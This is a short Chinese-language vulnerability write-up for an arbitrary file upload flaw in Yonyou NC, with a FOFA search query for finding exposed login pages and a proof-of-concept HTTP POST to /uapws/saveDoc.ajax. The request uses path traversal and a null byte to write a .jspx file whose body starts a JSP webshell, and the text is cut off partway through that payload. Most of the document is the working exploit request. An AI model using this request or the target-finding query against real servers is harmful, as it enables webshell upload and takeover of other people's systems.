0x01 漏洞分析
用友NC 存在任意文件上传漏洞,攻击者通过此漏洞可实现上传木马文件,控制服务器。
通过MethodInvocationHandler类中的异常处理信息也可以看出,该漏洞可以通过传入的json来调用实现过的本地服务接口
0x02 漏洞复现
fofa语法:title="产品登录界面"
影响范围:
包括了nc所有版本
poc:
POST /uapws/saveDoc.ajax?ws=/../../1x8ty.jspx%00 HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Connection: close
Content-Length: 286
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
content=<hi xmlns:hi="http://java.sun.com/JSP/Page">
<hi:directive.page import="java.util.*,java.io.*,java.net.*"/>
<hi:scriptlet>
out